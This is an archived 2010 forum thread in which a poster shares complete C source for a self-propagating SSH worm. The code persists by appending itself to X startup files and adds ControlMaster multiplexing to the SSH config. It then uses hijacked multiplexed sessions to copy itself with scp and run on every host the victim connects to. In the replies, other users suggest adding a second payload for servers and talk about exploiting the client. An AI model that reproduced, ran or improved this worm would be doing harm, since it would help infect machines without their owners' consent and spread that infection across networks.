Archived: "Stealth" SSH worm PoC

Fractals · 02-20-2010, 05:34 PM

I wrote a "stealth" ssh worm, it should be fully undetectable from IDSs because it doesn't try to bruteforce the password. Instead, it enables SSH multiplexing on the infected hosts and listens for a ssh connection to be made. Then it copies itself with scp and executes itself on the server. Unfortunatly sshd can't execute commands on the client (AFAIK), so it can only spread if the infected machine acts as a client, but only servers can get infected.

Code:

#include <stdio.h>
#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <dirent.h>

char fileLoc[] = "~/.opensshworm"; //default location to store worm

int autostart() {   //only works with X
    FILE *file;
    int len, i;
    char *buf, filename[2][12] = {"~/.xinitrc", "~/.xsession"};

    for(i=0; i<2; i++) {
        file = fopen(filename[i], "a+");
        if ( file == NULL ) return 0;

        fseek(file, 0, SEEK_END);
        len = ftell(file) + 1;      //get file length
        buf = (char *)malloc(len);
        rewind(file);
        fread(buf, 1, len, file);

        if (strstr(buf, fileLoc) != NULL) {
            free(buf);
            continue;  //already there!
        }
        free(buf);
        fseek(file, 0, SEEK_END);
        fwrite("\n", 1, 1, file);
        fwrite(fileLoc, 1, strlen(fileLoc), file);
        fclose(file);
    }
    return 1;
}

int setupSSH() {
    FILE *file;
    int len;
    char *ptr[5], *buf,
        t[] = "\nHost *\n   ControlMaster auto\n   ControlPath ~/.ssh/master-\%r@\%h:\%p\n";

    file = fopen("~/.ssh/config", "a+");
    if ( file == NULL ) return 0;

    fseek(file, 0, SEEK_END);
    len = ftell(file) + 1;      //get file length
    buf = (char *)malloc(len);
    rewind(file);
    fread(buf, 1, len, file);

    ptr[0] = strstr(buf, "Host *");
    if (ptr[0] != NULL) {
        ptr[1] = strstr(ptr[0]+4, "Host");
        ptr[2] = strstr(buf, "ControlMaster auto");
        if ( (ptr[2] > ptr[0]) && ( (ptr[2] < ptr[1]) | (ptr[1] == NULL)) ) { //already exists
            free(buf);
            return 1;
        }
    }

    fseek(file, 0, SEEK_END);
    fwrite(t, 1, strlen(t), file);
    fclose(file);
    free(buf);
    return 1;
}

int main(void) {
    if (autostart() == 0) return 0;
    if (setupSSH() == 0) return 0;

    DIR *ssh;
    struct dirent *dir;
    char *ptr, host[64], cmd[256];

    ssh = opendir(".ssh");
    if (ssh == NULL) {
        printf("error opening dir\n%i\n",errno);
        return 0;
    }
    while(1) {
        dir = readdir(ssh);
        if (dir == NULL) {  //if we checked all files, start over
            rewinddir(ssh);
            sleep(10);
            continue;
        }
        if (strncmp(dir->d_name, "master-", 7) == 0 ) {
            //ssh connection open, lets spread
            ptr = strchr(dir->d_name, '@');
            strcpy(host, ptr+1);
            ptr = strchr(host, ':');
            *ptr = 0;
            sprintf(cmd, "scp %s %s:%s && ssh %s %s &", fileLoc, host, fileLoc, host, fileLoc);
            system(cmd);
        }
    }
    closedir(ssh);
    return 1;
}

Hi-Guy · 02-25-2010, 06:29 AM

Quote:

Originally Posted by Fractals

it can only spread if the infected machine acts as a client, but only servers can get infected.

Maybe you can add a routine that checks if sshd is running (and therefore assume it's a server); if it does, you can make your program copy and run a different payload.

Also, a client that does not have x server will be impervious to it, right?

Fractals · 02-25-2010, 11:55 AM

I don't know of any vulnurabilities going the other way, but I'm kinda bored right now so I'll look into it. You're right about X, I should change my comments. xinitrc gets called by startx. I should also add it to .xsession, because sometimes it is called instead of xinitrc.

Fractals · 02-25-2010, 12:34 PM

I can't find any way to execute commands on the client. There might be some kind of buffer overflow, but then this program would get a lot bigger because it would have to send data pretending to be sshd. I like it's simplicity (read: I'm lazy

).

It's kinda sad how slow this forum is. I wonder if theres any way we can increase traffic? I guess theres just not that many coders on zoklet...

zecklips · 10-26-2011, 12:34 AM

Eh every one just hangs out in the networking forms more. Also, zoklet isnt filled with coders. If it was promoted more im sure you would have had multiple responses to this.

abhi771 · 04-09-2013, 11:01 AM

Recently I have seen a blog post on SSH worm. SSH Worm based on Python code - scary code and worm have a look
http://hackoftheday.securitytube.net...ng-python.html

On that blog there one video on SSH worm.